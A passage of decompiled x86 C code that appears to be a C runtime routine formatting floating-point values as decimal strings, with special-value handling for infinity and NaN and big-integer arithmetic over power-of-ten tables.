				signed int _t1041;
				signed int _t1043;
				signed int _t1044;
				signed int _t1045;
				signed int _t1049;
				signed int _t1053;
				signed int _t1054;
				signed int _t1055;
				signed int _t1057;
				signed int _t1058;
				signed int _t1059;
				signed int _t1060;
				signed int _t1061;
				signed int _t1062;
				signed int _t1064;
				signed int _t1065;
				signed int _t1066;
				signed int _t1067;
				signed int _t1068;
				signed int _t1069;
				unsigned int _t1070;
				void* _t1073;
				intOrPtr _t1075;
				signed int _t1076;
				signed int _t1077;
				signed int _t1078;
				signed int* _t1082;
				void* _t1086;
				void* _t1087;
				signed int _t1088;
				signed int _t1089;
				signed int _t1090;
				signed int _t1093;
				signed int _t1094;
				signed int _t1099;
				signed int _t1101;
				signed int _t1104;
				char _t1109;
				signed int _t1111;
				signed int _t1112;
				signed int _t1113;
				signed int _t1114;
				signed int _t1115;
				signed int _t1116;
				signed int _t1117;
				signed int _t1121;
				signed int _t1122;
				signed int _t1123;
				signed int _t1124;
				signed int _t1125;
				unsigned int _t1128;
				void* _t1132;
				void* _t1133;
				unsigned int _t1134;
				signed int _t1139;
				signed int _t1140;
				signed int _t1142;
				signed int _t1143;
				intOrPtr* _t1145;
				signed int _t1146;
				signed int _t1147;
				signed int _t1150;
				signed int _t1151;
				signed int _t1154;
				signed int _t1156;
				signed int _t1157;
				void* _t1158;
				signed int _t1159;
				signed int _t1160;
				signed int _t1161;
				void* _t1164;
				signed int _t1165;
				signed int _t1166;
				signed int _t1167;
				signed int _t1168;
				signed int _t1169;
				signed int* _t1172;
				signed int _t1173;
				signed int _t1174;
				signed int _t1175;
				signed int _t1176;
				intOrPtr* _t1178;
				intOrPtr* _t1179;
				signed int _t1181;
				signed int _t1183;
				signed int _t1186;
				signed int _t1192;
				signed int _t1196;
				signed int _t1197;
				intOrPtr _t1199;
				intOrPtr _t1200;
				signed int _t1205;
				signed int _t1208;
				signed int _t1209;
				signed int _t1210;
				signed int _t1211;
				signed int _t1212;
				signed int _t1213;
				signed int _t1215;
				signed int _t1216;
				signed int _t1217;
				signed int _t1218;
				signed int _t1220;
				signed int _t1221;
				signed int _t1222;
				signed int _t1223;
				signed int _t1224;
				signed int _t1226;
				signed int _t1227;
				signed int _t1229;
				signed int _t1231;
				signed int _t1233;
				signed int _t1235;
				signed int* _t1237;
				signed int* _t1241;
				signed int _t1250;

				_t725 =  *0x46a00c; // 0xbd45ae92
				_v8 = _t725 ^ _t1235;
				_t1016 = _a20;
				_t1145 = _a16;
				_v1924 = _t1145;
				_v1920 = _t1016;
				E0044D3D0( &_v1944, __eflags);
				_t1196 = _a8;
				_t730 = 0x2d;
				if((_t1196 & 0x80000000) == 0) {
					_t730 = 0x120;
				}
				 *_t1145 = _t730;
				 *((intOrPtr*)(_t1145 + 8)) = _t1016;
				_t1146 = _a4;
				if((_t1196 & 0x7ff00000) != 0) {
					L5:
					_t735 = L00443788( &_a4);
					_pop(_t1031);
					__eflags = _t735;
					if(_t735 != 0) {
						_t1031 = _v1924;
						 *((intOrPtr*)(_v1924 + 4)) = 1;
					}
					_t736 = _t735 - 1;
					__eflags = _t736;
					if(_t736 == 0) {
						_push("1#INF");
						goto L308;
					} else {
						_t751 = _t736 - 1;
						__eflags = _t751;
						if(_t751 == 0) {
							_push("1#QNAN");
							goto L308;
						} else {
							_t752 = _t751 - 1;
							__eflags = _t752;
							if(_t752 == 0) {
								_push("1#SNAN");
								goto L308;
							} else {
								__eflags = _t752 == 1;
								if(_t752 == 1) {
									_push("1#IND");
									goto L308;
								} else {
									_v1928 = _v1928 & 0x00000000;
									_a4 = _t1146;
									_a8 = _t1196 & 0x7fffffff;
									_t1250 = _a4;
									asm("fst qword [ebp-0x768]");
									_t1150 = _v1896;
									_v1916 = _a12 + 1;
									_t1036 = _t1150 >> 0x14;
									_t758 = _t1036 & 0x000007ff;
									__eflags = _t758;
									if(_t758 != 0) {
										_t1101 = 0;
										_t758 = 0;
										__eflags = 0;
									} else {
										_t1101 = 1;
									}
									_t1151 = _t1150 & 0x000fffff;
									_t1019 = _v1900 + _t758;
									asm("adc edi, esi");
									__eflags = _t1101;
									_t1037 = _t1036 & 0x000007ff;
									_t1205 = _t1037 - 0x434 + (0 | _t1101 != 0x00000000) + 1;
									_v1872 = _t1205;
									L0044FF70(_t1037, _t1250);
									_push(_t1037);
									_push(_t1037);
									 *_t1237 = _t1250;
									_t764 = L00450E00(E00450080(_t1151, _t1205), _t1250);
									_v1904 = _t764;
									__eflags = _t764 - 0x7fffffff;
									if(_t764 == 0x7fffffff) {
										L16:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t764 - 0x80000000;
										if(_t764 == 0x80000000) {
											goto L16;
										}
									}
									_v468 = _t1019;
									__eflags = _t1151;
									_v464 = _t1151;
									_t1022 = (0 | _t1151 != 0x00000000) + 1;
									_v472 = _t1022;
									__eflags = _t1205;
									if(_t1205 < 0) {
										__eflags = _t1205 - 0xfffffc02;
										if(_t1205 == 0xfffffc02) {
											L101:
											_t766 =  *((intOrPtr*)(_t1235 + _t1022 * 4 - 0x1d4));
											_t195 =  &_v1896;
											 *_t195 = _v1896 & 0x00000000;
											__eflags =  *_t195;
											asm("bsr eax, eax");
											if( *_t195 == 0) {
												_t1040 = 0;
												__eflags = 0;
											} else {
												_t1040 = _t766 + 1;
											}
											_t767 = 0x20;
											_t768 = _t767 - _t1040;
											__eflags = _t768 - 1;
											_t769 = _t768 & 0xffffff00 | _t768 - 0x00000001 > 0x00000000;
											__eflags = _t1022 - 0x73;
											_v1865 = _t769;
											_t1041 = _t1040 & 0xffffff00 | _t1022 - 0x00000073 > 0x00000000;
											__eflags = _t1022 - 0x73;
											if(_t1022 != 0x73) {
												L107:
												_t770 = 0;
												__eflags = 0;
											} else {
												__eflags = _t769;
												if(_t769 == 0) {
													goto L107;
												} else {
													_t770 = 1;
												}
											}
											__eflags = _t1041;
											if(_t1041 != 0) {
												L126:
												_v1400 = _v1400 & 0x00000000;
												_t224 =  &_v472;
												 *_t224 = _v472 & 0x00000000;
												__eflags =  *_t224;
												_push(0);
												_push( &_v1396);
												_push(0x1cc);
												_push( &_v468);
												L313();
												_t1237 =  &(_t1237[4]);
											} else {
												__eflags = _t770;
												if(_t770 != 0) {
													goto L126;
												} else {
													_t1068 = 0x72;
													__eflags = _t1022 - _t1068;
													if(_t1022 < _t1068) {
														_t1068 = _t1022;
													}
													__eflags = _t1068 - 0xffffffff;
													if(_t1068 != 0xffffffff) {
														_t1223 = _t1068;
														_t1178 =  &_v468 + _t1068 * 4;
														_v1880 = _t1178;
														while(1) {
															__eflags = _t1223 - _t1022;
															if(_t1223 >= _t1022) {
																_t208 =  &_v1876;
																 *_t208 = _v1876 & 0x00000000;
																__eflags =  *_t208;
															} else {
																_v1876 =  *_t1178;
															}
															_t210 = _t1223 - 1; // 0x70
															__eflags = _t210 - _t1022;
															if(_t210 >= _t1022) {
																_t1128 = 0;
																__eflags = 0;
															} else {
																_t1128 =  *(_t1178 - 4);
															}
															_t1178 = _t1178 - 4;
															_t936 = _v1880;
															_t1223 = _t1223 - 1;
															 *_t936 = _t1128 >> 0x0000001f ^ _v1876 + _v1876;
															_v1880 = _t936 - 4;
															__eflags = _t1223 - 0xffffffff;
															if(_t1223 == 0xffffffff) {
																break;
															}
															_t1022 = _v472;
														}
														_t1205 = _v1872;
													}
													__eflags = _v1865;
													if(_v1865 == 0) {
														_v472 = _t1068;
													} else {
														_t218 = _t1068 + 1; // 0x73
														_v472 = _t218;
													}
												}
											}
											_t1154 = 1 - _t1205;
											L00431F00(_t1154,  &_v1396, 0, 1);
											__eflags = 1;
											 *(_t1235 + 0xbad63d) = 1 << (_t1154 & 0x0000001f);
											_t778 = 0xbadbae;
										} else {
											_v1396 = _v1396 & 0x00000000;
											_t1069 = 2;
											_v1392 = 0x100000;
											_v1400 = _t1069;
											__eflags = _t1022 - _t1069;
											if(_t1022 == _t1069) {
												_t1132 = 0;
												__eflags = 0;
												while(1) {
													_t938 =  *((intOrPtr*)(_t1235 + _t1132 - 0x570));
													__eflags = _t938 -  *((intOrPtr*)(_t1235 + _t1132 - 0x1d0));
													if(_t938 !=  *((intOrPtr*)(_t1235 + _t1132 - 0x1d0))) {
														goto L101;
													}
													_t1132 = _t1132 + 4;
													__eflags = _t1132 - 8;
													if(_t1132 != 8) {
														continue;
													} else {
														_t166 =  &_v1896;
														 *_t166 = _v1896 & 0x00000000;
														__eflags =  *_t166;
														asm("bsr eax, edi");
														if( *_t166 == 0) {
															_t1133 = 0;
															__eflags = 0;
														} else {
															_t1133 = _t938 + 1;
														}
														_t939 = 0x20;
														_t1224 = _t1069;
														__eflags = _t939 - _t1133 - _t1069;
														_t941 =  &_v460;
														_v1880 = _t941;
														_t1179 = _t941;
														_t171 =  &_v1865;
														 *_t171 = _t939 - _t1133 - _t1069 > 0;
														__eflags =  *_t171;
														while(1) {
															__eflags = _t1224 - _t1022;
															if(_t1224 >= _t1022) {
																_t173 =  &_v1876;
																 *_t173 = _v1876 & 0x00000000;
																__eflags =  *_t173;
															} else {
																_v1876 =  *_t1179;
															}
															_t175 = _t1224 - 1; // 0x0
															__eflags = _t175 - _t1022;
															if(_t175 >= _t1022) {
																_t1134 = 0;
																__eflags = 0;
															} else {
																_t1134 =  *(_t1179 - 4);
															}
															_t1179 = _t1179 - 4;
															_t945 = _v1880;
															_t1224 = _t1224 - 1;
															 *_t945 = _t1134 >> 0x0000001e ^ _v1876 << 0x00000002;
															_v1880 = _t945 - 4;
															__eflags = _t1224 - 0xffffffff;
															if(_t1224 == 0xffffffff) {
																break;
															}
															_t1022 = _v472;
														}
														__eflags = _v1865;
														_t1070 = _t1069 - _v1872;
														_v472 = (0 | _v1865 != 0x00000000) + _t1069;
														_t1181 = _t1070 >> 5;
														_v1884 = _t1070;
														_t1226 = _t1181 << 2;
														L00431F00(_t1181,  &_v1396, 0, _t1226);
														 *(_t1235 + _t1226 - 0x570) = 1 << (_v1884 & 0x0000001f);
														_t778 = _t1181 + 1;
													}
													goto L128;
												}
											}
											goto L101;
										}
										L128:
										_v1400 = _t778;
										_t1025 = 0x1cc;
										_v936 = _t778;
										_t779 = _t778 << 2;
										__eflags = _t779;
										_push(_t779);
										_push( &_v1396);
										_push(0x1cc);
										_push( &_v932);
										L313();
										_t1241 =  &(_t1237[7]);
									} else {
										_v1396 = _v1396 & 0x00000000;
										_t1227 = 2;
										_v1392 = 0x100000;
										_v1400 = _t1227;
										__eflags = _t1022 - _t1227;
										if(_t1022 != _t1227) {
											L53:
											_t956 = _v1872 + 1;
											_t957 = _t956 & 0x0000001f;
											_t1073 = 0x20;
											_v1876 = _t957;
											_t1183 = _t956 >> 5;
											_v1872 = _t1183;
											_v1908 = _t1073 - _t957;
											_t960 = L00450DC0(1, _t1073 - _t957, 0);
											_t1075 =  *((intOrPtr*)(_t1235 + _t1022 * 4 - 0x1d4));
											_t961 = _t960 - 1;
											_t108 =  &_v1896;
											 *_t108 = _v1896 & 0x00000000;
											__eflags =  *_t108;
											asm("bsr ecx, ecx");
											_v1884 = _t961;
											_v1912 =  !_t961;
											if( *_t108 == 0) {
												_t1076 = 0;
												__eflags = 0;
											} else {
												_t1076 = _t1075 + 1;
											}
											_t963 = 0x20;
											_t964 = _t963 - _t1076;
											_t1139 = _t1022 + _t1183;
											__eflags = _v1876 - _t964;
											_v1892 = _t1139;
											_t965 = _t964 & 0xffffff00 | _v1876 - _t964 > 0x00000000;
											__eflags = _t1139 - 0x73;
											_v1865 = _t965;
											_t1077 = _t1076 & 0xffffff00 | _t1139 - 0x00000073 > 0x00000000;
											__eflags = _t1139 - 0x73;
											if(_t1139 != 0x73) {
												L59:
												_t966 = 0;
												__eflags = 0;
											} else {
												__eflags = _t965;
												if(_t965 == 0) {
													goto L59;
												} else {
													_t966 = 1;
												}
											}
											__eflags = _t1077;
											if(_t1077 != 0) {
												L81:
												__eflags = 0;
												_t1025 = 0x1cc;
												_push(0);
												_v1400 = 0;
												_v472 = 0;
												_push( &_v1396);
												_push(0x1cc);
												_push( &_v468);
												L313();
												_t1237 =  &(_t1237[4]);
											} else {
												__eflags = _t966;
												if(_t966 != 0) {
													goto L81;
												} else {
													_t1078 = 0x72;
													__eflags = _t1139 - _t1078;
													if(_t1139 >= _t1078) {
														_t1139 = _t1078;
														_v1892 = _t1078;
													}
													_t974 = _t1139;
													_v1880 = _t974;
													__eflags = _t1139 - 0xffffffff;
													if(_t1139 != 0xffffffff) {
														_t1140 = _v1872;
														_t1229 = _t1139 - _t1140;
														__eflags = _t1229;
														_t1082 =  &_v468 + _t1229 * 4;
														_v1888 = _t1082;
														while(1) {
															__eflags = _t974 - _t1140;
															if(_t974 < _t1140) {
																break;
															}
															__eflags = _t1229 - _t1022;
															if(_t1229 >= _t1022) {
																_t1186 = 0;
																__eflags = 0;
															} else {
																_t1186 =  *_t1082;
															}
															__eflags = _t1229 - 1 - _t1022;
															if(_t1229 - 1 >= _t1022) {
																_t979 = 0;
																__eflags = 0;
															} else {
																_t979 =  *(_t1082 - 4);
															}
															_t982 = _v1880;
															_t1082 = _v1888 - 4;
															_v1888 = _t1082;
															 *(_t1235 + _t982 * 4 - 0x1d0) = (_t1186 & _v1884) << _v1876 | (_t979 & _v1912) >> _v1908;
															_t974 = _t982 - 1;
															_t1229 = _t1229 - 1;
															_v1880 = _t974;
															__eflags = _t974 - 0xffffffff;
															if(_t974 != 0xffffffff) {
																_t1022 = _v472;
																continue;
															}
															break;
														}
														_t1139 = _v1892;
														_t1183 = _v1872;
														_t1227 = 2;
													}
													__eflags = _t1183;
													if(_t1183 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1183 << 2);
														_t1237 =  &(_t1237[3]);
													}
													__eflags = _v1865;
													_t1025 = 0x1cc;
													if(_v1865 == 0) {
														_v472 = _t1139;
													} else {
														_v472 = _t1139 + 1;
													}
												}
											}
											_v1392 = _v1392 & 0x00000000;
											_v1396 = _t1227;
											_v1400 = 1;
											_v936 = 1;
											_push(4);
										} else {
											_t1086 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1235 + _t1086 - 0x570)) -  *((intOrPtr*)(_t1235 + _t1086 - 0x1d0));
												if( *((intOrPtr*)(_t1235 + _t1086 - 0x570)) !=  *((intOrPtr*)(_t1235 + _t1086 - 0x1d0))) {
													goto L53;
												}
												_t1086 = _t1086 + 4;
												__eflags = _t1086 - 8;
												if(_t1086 != 8) {
													continue;
												} else {
													_t985 = _v1872 + 2;
													_t986 = _t985 & 0x0000001f;
													_t1087 = 0x20;
													_t1088 = _t1087 - _t986;
													_v1888 = _t986;
													_t1231 = _t985 >> 5;
													_v1876 = _t1231;
													_v1908 = _t1088;
													_t989 = L00450DC0(1, _t1088, 0);
													_v1896 = _v1896 & 0x00000000;
													_t990 = _t989 - 1;
													__eflags = _t990;
													asm("bsr ecx, edi");
													_v1884 = _t990;
													_v1912 =  !_t990;
													if(_t990 == 0) {
														_t1089 = 0;
														__eflags = 0;
													} else {
														_t1089 = _t1088 + 1;
													}
													_t992 = 0x20;
													_t993 = _t992 - _t1089;
													_t1142 = _t1231 + 2;
													__eflags = _v1888 - _t993;
													_v1880 = _t1142;
													_t994 = _t993 & 0xffffff00 | _v1888 - _t993 > 0x00000000;
													__eflags = _t1142 - 0x73;
													_v1865 = _t994;
													_t1090 = _t1089 & 0xffffff00 | _t1142 - 0x00000073 > 0x00000000;
													__eflags = _t1142 - 0x73;
													if(_t1142 != 0x73) {
														L28:
														_t995 = 0;
														__eflags = 0;
													} else {
														__eflags = _t994;
														if(_t994 == 0) {
															goto L28;
														} else {
															_t995 = 1;
														}
													}
													__eflags = _t1090;
													if(_t1090 != 0) {
														L50:
														__eflags = 0;
														_t1025 = 0x1cc;
														_push(0);
														_v1400 = 0;
														_v472 = 0;
														_push( &_v1396);
														_push(0x1cc);
														_push( &_v468);
														L313();
														_t1237 =  &(_t1237[4]);
													} else {
														__eflags = _t995;
														if(_t995 != 0) {
															goto L50;
														} else {
															_t1093 = 0x72;
															__eflags = _t1142 - _t1093;
															if(_t1142 >= _t1093) {
																_t1142 = _t1093;
																_v1880 = _t1093;
															}
															_t1094 = _t1142;
															_v1892 = _t1094;
															__eflags = _t1142 - 0xffffffff;
															if(_t1142 != 0xffffffff) {
																_t1143 = _v1876;
																_t1233 = _t1142 - _t1143;
																__eflags = _t1233;
																_t1004 =  &_v468 + _t1233 * 4;
																_v1872 = _t1004;
																while(1) {
																	__eflags = _t1094 - _t1143;
																	if(_t1094 < _t1143) {
																		break;
																	}
																	__eflags = _t1233 - _t1022;
																	if(_t1233 >= _t1022) {
																		_t1192 = 0;
																		__eflags = 0;
																	} else {
																		_t1192 =  *_t1004;
																	}
																	__eflags = _t1233 - 1 - _t1022;
																	if(_t1233 - 1 >= _t1022) {
																		_t1006 = 0;
																		__eflags = 0;
																	} else {
																		_t1006 =  *(_v1872 - 4);
																	}
																	_t1099 = _v1892;
																	 *(_t1235 + _t1099 * 4 - 0x1d0) = (_t1006 & _v1912) >> _v1908 | (_t1192 & _v1884) << _v1888;
																	_t1094 = _t1099 - 1;
																	_t1233 = _t1233 - 1;
																	_t1004 = _v1872 - 4;
																	_v1892 = _t1094;
																	_v1872 = _t1004;
																	__eflags = _t1094 - 0xffffffff;
																	if(_t1094 != 0xffffffff) {
																		_t1022 = _v472;
																		continue;
																	}
																	break;
																}
																_t1142 = _v1880;
																_t1231 = _v1876;
															}
															__eflags = _t1231;
															if(_t1231 != 0) {
																__eflags = 0;
																memset( &_v468, 0, _t1231 << 2);
																_t1237 =  &(_t1237[3]);
															}
															__eflags = _v1865;
															_t1025 = 0x1cc;
															if(_v1865 == 0) {
																_v472 = _t1142;
															} else {
																_v472 = _t1142 + 1;
															}
														}
													}
													_v1392 = _v1392 & 0x00000000;
													_t999 = 4;
													__eflags = 1;
													_v1396 = _t999;
													_v1400 = 1;
													_v936 = 1;
													_push(_t999);
												}
												goto L52;
											}
											goto L53;
										}
										L52:
										_push( &_v1396);
										_push(_t1025);
										_push( &_v932);
										L313();
										_t1241 =  &(_t1237[4]);
									}
									_t782 = _v1904;
									_t1043 = 0xa;
									_v1912 = _t1043;
									__eflags = _t782;
									if(_t782 < 0) {
										_t783 =  ~_t782;
										_t784 = _t783 / _t1043;
										_v1880 = _t784;
										_t1044 = _t783 % _t1043;
										_v1884 = _t1044;
										__eflags = _t784;
										if(_t784 == 0) {
											L249:
											__eflags = _t1044;
											if(_t1044 != 0) {
												_t820 =  *(0x458654 + _t1044 * 4);
												_v1896 = _t820;
												__eflags = _t820;
												if(_t820 == 0) {
													L260:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L261;
												} else {
													__eflags = _t820 - 1;
													if(_t820 != 1) {
														_t1055 = _v472;
														__eflags = _t1055;
														if(_t1055 != 0) {
															_t1161 = 0;
															_t1213 = 0;
															__eflags = 0;
															do {
																_t1113 = _t820 *  *(_t1235 + _t1213 * 4 - 0x1d0) >> 0x20;
																 *(_t1235 + _t1213 * 4 - 0x1d0) = _t820 *  *(_t1235 + _t1213 * 4 - 0x1d0) + _t1161;
																_t820 = _v1896;
																asm("adc edx, 0x0");
																_t1213 = _t1213 + 1;
																_t1161 = _t1113;
																__eflags = _t1213 - _t1055;
															} while (_t1213 != _t1055);
															__eflags = _t1161;
															if(_t1161 != 0) {
																_t826 = _v472;
																__eflags = _t826 - 0x73;
																if(_t826 >= 0x73) {
																	goto L260;
																} else {
																	 *(_t1235 + _t826 * 4 - 0x1d0) = _t1161;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t784 - 0x26;
												if(_t784 > 0x26) {
													_t784 = 0x26;
												}
												_t1056 =  *(0x4585be + _t784 * 4) & 0x000000ff;
												_v1872 = _t784;
												_v1400 = ( *(0x4585be + _t784 * 4) & 0x000000ff) + ( *(0x4585bf + _t784 * 4) & 0x000000ff);
												L00431F00(_t1056 << 2,  &_v1396, 0, _t1056 << 2);
												_t837 = E004324E0( &(( &_v1396)[_t1056]), 0x457cb8 + ( *(0x4585bc + _v1872 * 4) & 0x0000ffff) * 4, ( *(0x4585bf + _t784 * 4) & 0x000000ff) << 2);
												_t1057 = _v1400;
												_t1241 =  &(_t1241[6]);
												_v1892 = _t1057;
												__eflags = _t1057 - 1;
												if(_t1057 > 1) {
													__eflags = _v472 - 1;
													if(_v472 > 1) {
														__eflags = _t1057 - _v472;
														_t1164 =  &_v1396;
														_t838 = _t837 & 0xffffff00 | _t1057 - _v472 > 0x00000000;
														__eflags = _t838;
														if(_t838 != 0) {
															_t1114 =  &_v468;
														} else {
															_t1164 =  &_v468;
															_t1114 =  &_v1396;
														}
														_v1908 = _t1114;
														__eflags = _t838;
														if(_t838 == 0) {
															_t1057 = _v472;
														}
														_v1876 = _t1057;
														__eflags = _t838;
														if(_t838 != 0) {
															_v1892 = _v472;
														}
														_t1115 = 0;
														_t1215 = 0;
														_v1864 = 0;
														__eflags = _t1057;
														if(_t1057 == 0) {
															L243:
															_v472 = _t1115;
															_t840 = _t1115 << 2;
															__eflags = _t840;
															_push(_t840);
															_t841 =  &_v1860;
															goto L244;
														} else {
															_t1165 = _t1164 -  &_v1860;
															__eflags = _t1165;
															_v1928 = _t1165;
															do {
																_t847 =  *(_t1235 + _t1165 + _t1215 * 4 - 0x740);
																_v1896 = _t847;
																__eflags = _t847;
																if(_t847 != 0) {
																	_t848 = 0;
																	_t1166 = 0;
																	_t1058 = _t1215;
																	_v1888 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L240:
																		__eflags = _t1058 - 0x73;
																		if(_t1058 == 0x73) {
																			goto L258;
																		} else {
																			_t1165 = _v1928;
																			_t1057 = _v1876;
																			goto L242;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1058 - 0x73;
																			if(_t1058 == 0x73) {
																				goto L235;
																			}
																			__eflags = _t1058 - _t1115;
																			if(_t1058 == _t1115) {
																				 *(_t1235 + _t1058 * 4 - 0x740) =  *(_t1235 + _t1058 * 4 - 0x740) & 0x00000000;
																				_t859 = _t848 + 1 + _t1215;
																				__eflags = _t859;
																				_v1864 = _t859;
																				_t848 = _v1888;
																			}
																			_t854 =  *(_v1908 + _t848 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1235 + _t1058 * 4 - 0x740) =  *(_t1235 + _t1058 * 4 - 0x740) + _t854 * _v1896 + _t1166;
																			asm("adc edx, 0x0");
																			_t848 = _v1888 + 1;
																			_t1058 = _t1058 + 1;
																			_v1888 = _t848;
																			_t1166 = _t854 * _v1896 >> 0x20;
																			_t1115 = _v1864;
																			__eflags = _t848 - _v1892;
																			if(_t848 != _v1892) {
																				continue;
																			} else {
																				goto L235;
																			}
																			while(1) {
																				L235:
																				__eflags = _t1166;
																				if(_t1166 == 0) {
																					goto L240;
																				}
																				__eflags = _t1058 - 0x73;
																				if(_t1058 == 0x73) {
																					goto L258;
																				} else {
																					__eflags = _t1058 - _t1115;
																					if(_t1058 == _t1115) {
																						_t558 = _t1235 + _t1058 * 4 - 0x740;
																						 *_t558 =  *(_t1235 + _t1058 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t558;
																						_t564 = _t1058 + 1; // 0x1
																						_v1864 = _t564;
																					}
																					_t852 = _t1166;
																					_t1166 = 0;
																					 *(_t1235 + _t1058 * 4 - 0x740) =  *(_t1235 + _t1058 * 4 - 0x740) + _t852;
																					_t1115 = _v1864;
																					asm("adc edi, edi");
																					_t1058 = _t1058 + 1;
																					continue;
																				}
																				goto L246;
																			}
																			goto L240;
																		}
																		goto L235;
																	}
																} else {
																	__eflags = _t1215 - _t1115;
																	if(_t1215 == _t1115) {
																		 *(_t1235 + _t1215 * 4 - 0x740) =  *(_t1235 + _t1215 * 4 - 0x740) & _t847;
																		_t526 = _t1215 + 1; // 0x1
																		_t1115 = _t526;
																		_v1864 = _t1115;
																	}
																	goto L242;
																}
																goto L246;
																L242:
																_t1215 = _t1215 + 1;
																__eflags = _t1215 - _t1057;
															} while (_t1215 != _t1057);
															goto L243;
														}
													} else {
														_t1167 = _v468;
														_push(_t1057 << 2);
														_v472 = _t1057;
														_push( &_v1396);
														_push(_t1025);
														_push( &_v468);
														L313();
														_t1241 =  &(_t1241[4]);
														__eflags = _t1167;
														if(_t1167 == 0) {
															goto L203;
														} else {
															__eflags = _t1167 - 1;
															if(_t1167 == 1) {
																goto L245;
															} else {
																__eflags = _v472;
																if(_v472 == 0) {
																	goto L245;
																} else {
																	_t1059 = 0;
																	_v1896 = _v472;
																	_t1216 = 0;
																	__eflags = 0;
																	do {
																		_t867 = _t1167;
																		_t1116 = _t867 *  *(_t1235 + _t1216 * 4 - 0x1d0) >> 0x20;
																		 *(_t1235 + _t1216 * 4 - 0x1d0) = _t867 *  *(_t1235 + _t1216 * 4 - 0x1d0) + _t1059;
																		asm("adc edx, 0x0");
																		_t1216 = _t1216 + 1;
																		_t1059 = _t1116;
																		__eflags = _t1216 - _v1896;
																	} while (_t1216 != _v1896);
																	goto L208;
																}
															}
														}
													}
												} else {
													_t1168 = _v1396;
													__eflags = _t1168;
													if(_t1168 != 0) {
														__eflags = _t1168 - 1;
														if(_t1168 == 1) {
															goto L245;
														} else {
															__eflags = _v472;
															if(_v472 == 0) {
																goto L245;
															} else {
																_t1060 = 0;
																_v1896 = _v472;
																_t1217 = 0;
																__eflags = 0;
																do {
																	_t872 = _t1168;
																	_t1117 = _t872 *  *(_t1235 + _t1217 * 4 - 0x1d0) >> 0x20;
																	 *(_t1235 + _t1217 * 4 - 0x1d0) = _t872 *  *(_t1235 + _t1217 * 4 - 0x1d0) + _t1060;
																	asm("adc edx, 0x0");
																	_t1217 = _t1217 + 1;
																	_t1060 = _t1117;
																	__eflags = _t1217 - _v1896;
																} while (_t1217 != _v1896);
																L208:
																__eflags = _t1059;
																if(_t1059 == 0) {
																	goto L245;
																} else {
																	_t870 = _v472;
																	__eflags = _t870 - 0x73;
																	if(_t870 >= 0x73) {
																		L258:
																		_push(0);
																		_v2408 = 0;
																		_v472 = 0;
																		_push( &_v2404);
																		_push(_t1025);
																		_push( &_v468);
																		L313();
																		_t1241 =  &(_t1241[4]);
																		_t843 = 0;
																	} else {
																		 *(_t1235 + _t870 * 4 - 0x1d0) = _t1059;
																		_v472 = _v472 + 1;
																		goto L245;
																	}
																}
															}
														}
													} else {
														L203:
														_v2408 = 0;
														_v472 = 0;
														_push(0);
														_t841 =  &_v2404;
														L244:
														_push(_t841);
														_push(_t1025);
														_push( &_v468);
														L313();
														_t1241 =  &(_t1241[4]);
														L245:
														_t843 = 1;
													}
												}
												L246:
												__eflags = _t843;
												if(_t843 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_v472 = _v472 & 0x00000000;
													_push(0);
													L261:
													_push( &_v2404);
													_t823 =  &_v468;
													goto L262;
												} else {
													goto L247;
												}
												goto L263;
												L247:
												_t784 = _v1880 - _v1872;
												__eflags = _t784;
												_v1880 = _t784;
											} while (_t784 != 0);
											_t1044 = _v1884;
											goto L249;
										}
									} else {
										_t875 = _t782 / _t1043;
										_v1908 = _t875;
										_t1061 = _t782 % _t1043;
										_v1896 = _t1061;
										__eflags = _t875;
										if(_t875 == 0) {
											L184:
											__eflags = _t1061;
											if(_t1061 != 0) {
												_t1169 =  *(0x458654 + _t1061 * 4);
												__eflags = _t1169;
												if(_t1169 != 0) {
													__eflags = _t1169 - 1;
													if(_t1169 != 1) {
														_t876 = _v936;
														_v1896 = _t876;
														__eflags = _t876;
														if(_t876 != 0) {
															_t1218 = 0;
															_t1062 = 0;
															__eflags = 0;
															do {
																_t877 = _t1169;
																_t1121 = _t877 *  *(_t1235 + _t1062 * 4 - 0x3a0) >> 0x20;
																 *(_t1235 + _t1062 * 4 - 0x3a0) = _t877 *  *(_t1235 + _t1062 * 4 - 0x3a0) + _t1218;
																asm("adc edx, 0x0");
																_t1062 = _t1062 + 1;
																_t1218 = _t1121;
																__eflags = _t1062 - _v1896;
															} while (_t1062 != _v1896);
															__eflags = _t1218;
															if(_t1218 != 0) {
																_t880 = _v936;
																__eflags = _t880 - 0x73;
																if(_t880 >= 0x73) {
																	goto L186;
																} else {
																	 *(_t1235 + _t880 * 4 - 0x3a0) = _t1218;
																	_v936 = _v936 + 1;
																}
															}
														}
													}
												} else {
													L186:
													_v2408 = 0;
													_v936 = 0;
													_push(0);
													goto L190;
												}
											}
										} else {
											do {
												__eflags = _t875 - 0x26;
												if(_t875 > 0x26) {
													_t875 = 0x26;
												}
												_t1063 =  *(0x4585be + _t875 * 4) & 0x000000ff;
												_v1888 = _t875;
												_v1400 = ( *(0x4585be + _t875 * 4) & 0x000000ff) + ( *(0x4585bf + _t875 * 4) & 0x000000ff);
												L00431F00(_t1063 << 2,  &_v1396, 0, _t1063 << 2);
												_t893 = E004324E0( &(( &_v1396)[_t1063]), 0x457cb8 + ( *(0x4585bc + _v1888 * 4) & 0x0000ffff) * 4, ( *(0x4585bf + _t875 * 4) & 0x000000ff) << 2);
												_t1064 = _v1400;
												_t1241 =  &(_t1241[6]);
												_v1892 = _t1064;
												__eflags = _t1064 - 1;
												if(_t1064 > 1) {
													__eflags = _v936 - 1;
													if(_v936 > 1) {
														__eflags = _t1064 - _v936;
														_t1172 =  &_v1396;
														_t894 = _t893 & 0xffffff00 | _t1064 - _v936 > 0x00000000;
														__eflags = _t894;
														if(_t894 != 0) {
															_t1122 =  &_v932;
														} else {
															_t1172 =  &_v932;
															_t1122 =  &_v1396;
														}
														_v1876 = _t1122;
														__eflags = _t894;
														if(_t894 == 0) {
															_t1064 = _v936;
														}
														_v1880 = _t1064;
														__eflags = _t894;
														if(_t894 != 0) {
